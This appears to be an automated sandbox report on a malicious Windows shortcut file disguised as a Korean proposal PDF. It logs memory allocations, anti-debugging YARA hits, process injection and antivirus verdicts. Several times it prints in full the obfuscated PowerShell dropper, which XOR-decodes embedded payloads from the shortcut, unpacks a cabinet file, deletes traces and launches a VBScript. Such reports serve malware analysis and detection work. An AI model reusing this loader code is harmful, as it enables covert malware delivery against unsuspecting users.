NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0208a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02063000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02064000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0209b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02097000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0205b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02082000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02095000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02065000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0208c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02066000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0209c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02083000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02084000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02085000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02086000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02087000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02088000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02089000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a2e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\제안서.pdf.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) \| <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;"
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) \| <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;" ) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 11, 2025, 3:35 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) \| <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;"
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) \| <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;" ) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\expand.exe" C:\Users\Public\nearby.cab -F:* C:\Users\Public\documents

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2560 resumed a thread in remote process 2648
NtResumeThread April 11, 2025, 3:35 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2648	1	0	0

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\expand.exe

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

MicroWorld-eScan	Heur.BZC.YAX.Pantera.229.198946D1
CTX	lnk.unknown.pantera
Skyhigh	BehavesLike.Dropper.rb
VIPRE	Heur.BZC.YAX.Pantera.228.198946D1
Arcabit	Heur.BZC.YAX.Pantera.229.198946D1
Symantec	Scr.Mallnk!gen13
ESET-NOD32	LNK/Agent.AHE
TrendMicro-HouseCall	HEUR_LNKEXEC.A
Avast	LNK:Agent-HN [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Powecod.c
BitDefender	Heur.BZC.YAX.Pantera.229.198946D1
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft	Heur.BZC.YAX.Pantera.229.198946D1 (B)
TrendMicro	HEUR_LNKEXEC.A
Sophos	Mal/LnkObf-A
SentinelOne	Static AI - Suspicious LNK
Google	Detected
ZoneAlarm	Mal/LnkObf-A
